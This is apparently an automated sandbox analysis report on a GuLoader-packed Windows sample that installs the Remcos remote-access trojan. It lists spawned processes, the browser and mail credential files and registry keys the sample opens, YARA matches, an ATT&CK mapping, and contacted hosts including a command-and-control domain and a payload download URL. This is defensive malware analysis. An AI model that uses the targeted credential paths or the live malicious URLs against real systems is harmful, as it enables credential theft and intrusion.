              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\lmosdawqehkmlcbfmkivthwvnjpkkkqrhv"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\wotkesh"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx"
              Source: asXlZG3aW6.exe, 00000082.00000003.21794019954.00000000052CA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269848899.00000000052D9000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
              Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managernutes }
              Source: asXlZG3aW6.exe, 00000082.00000003.21794019954.00000000052CA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21784839401.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793019950.00000000052CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managermazon.com"},{"
              Source: asXlZG3aW6.exe, 00000082.00000002.26269543770.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerA
              Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerinutes }
              Source: asXlZG3aW6.exe, 00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269848899.00000000052D9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
              Source: asXlZG3aW6.exe, 00000082.00000002.26269543770.0000000005248000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerR
              Source: asXlZG3aW6.exe, 00000082.00000003.21794019954.00000000052CA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21776966540.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21784839401.00000000052DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager,{"applied_pol
              Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_367B2933 cpuid 130_2_367B2933
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_367B2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,130_2_367B2264
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 132_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,132_2_004082CD
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031F1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000002.26258711325.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000002.26269649402.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21777083214.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21785310662.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21784839401.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000002.26269787785.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947522575.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947642663.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21827014519.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21793113422.00000000052B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: asXlZG3aW6.exe PID: 4464, type: MEMORYSTR
              Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: ESMTPPassword 132_2_004033F0
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 132_2_00402DB3
              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 132_2_00402DB3
              Source: Yara match | File source: Process Memory Space: asXlZG3aW6.exe PID: 4464, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: asXlZG3aW6.exe PID: 6596, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-13IBN7
              Source: Yara match | File source: 00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000002.26258711325.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000002.26269649402.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21777083214.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21785310662.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21784839401.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000002.26269787785.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947522575.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947642663.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21827014519.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21793113422.00000000052B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: asXlZG3aW6.exe PID: 4464, type: MEMORYSTR
              Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              MITRE ATT&CK Matrix

              Techniques are listed per tactic in the report's row order; a number in parentheses is the report's count of matching signatures for that technique, and entries without a number are matrix cells with no match.

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
              Execution: Native API (11); Command and Scripting Interpreter (12); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
              Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (11); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
              Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (112); Registry Run Keys / Startup Folder (11); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
              Defense Evasion: Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (111); Virtualization/Sandbox Evasion (11); Access Token Manipulation (1); Process Injection (112); Time Based Evasion (1); Dynamic API Resolution
              Credential Access: OS Credential Dumping (1); Input Capture (11); Credentials in Registry (2); Credentials In Files (1); LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
              Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (129); Security Software Discovery (431); Virtualization/Sandbox Evasion (11); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1); Time Based Evasion (1)
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
              Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (11); Clipboard Data (2); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
              Command and Control: Ingress Tool Transfer (1); Encrypted Channel (21); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (113); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
              Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              Behavior Graph ID: 1529110 | Sample: asXlZG3aW6.exe | Startdate: 08/10/2024 | Architecture: WINDOWS | Score: 100

              Start
                Contacted hosts: newfarmn.pro; telesavers.co.za; geoplugin.net
                Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for dropped file; 7 other signatures
                Started: asXlZG3aW6.exe (34 created files)

              asXlZG3aW6.exe (34 created files)
                Dropped: C:\Users\user\AppData\Local\...\nsExec.dll, PE32; C:\Users\user\AppData\Local\...\System.dll, PE32
                Signatures: Detected unpacking (changes PE section rights); Submitted sample is a known malware sample; Tries to steal Mail credentials (via file registry); 6 other signatures
                Started: asXlZG3aW6.exe (4 created registry values, 19 created files); cmd.exe; cmd.exe; 62 other processes

              asXlZG3aW6.exe (4 created registry values, 19 created files)
                Network: newfarmn.pro 41.216.188.178, 2404, 49736, 49737, AS40676US South Africa; telesavers.co.za 102.65.21.26, 443, 49735, Web-Africa-Networks-ASZA South Africa; geoplugin.net 178.237.33.50, 49740, 80, ATOM86-ASATOM86NL Netherlands
                Dropped: C:\Users\user\AppData\...\Uforsvarlige.scr, PE32; C:\ProgramData\remcos\logs.dat, data
                Signatures: Detected Remcos RAT; Creates autostart registry keys with suspicious values (likely registry only malware); Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures
                Started: asXlZG3aW6.exe (three child instances)

              cmd.exe (first instance) started Conhost.exe; cmd.exe (second instance) started Conhost.exe; the 62 other processes started three Conhost.exe instances and 59 other processes

              asXlZG3aW6.exe (first child of the second-stage process)
                Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)

              asXlZG3aW6.exe (second child of the second-stage process)
                Signatures: Tries to harvest and steal browser information (history, passwords, etc)

              Source | Detection | Scanner | Label | Link
              asXlZG3aW6.exe | 55% | ReversingLabs | Win32.Trojan.Guloader |

              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr | 55% | ReversingLabs | Win32.Trojan.Guloader |
              C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\nsExec.dll | 0% | ReversingLabs | |
              No Antivirus matches
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              telesavers.co.za | 102.65.21.26 | true | false | | unknown
              newfarmn.pro | 41.216.188.178 | true | true | | unknown
              geoplugin.net | 178.237.33.50 | true | false | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              http://geoplugin.net/json.gp | false | | unknown
              newfarmn.pro | true | | unknown
              https://telesavers.co.za/EsbmqCxkb162.bin | false | | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD | asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818947265.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://crl.pki.goog/gsr1/gsr1.crl0; | bhv2AA3.tmp.131.dr | false | | unknown
              http://www.imvu.comr | asXlZG3aW6.exe, 00000082.00000002.26280391623.0000000036780000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
              https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211 | asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://eb2.3lift.com/sync? | asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://support.google.com/chrome/?p=plugin_flash | asXlZG3aW6.exe, 00000083.00000003.21824645097.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21824737604.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21824954221.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
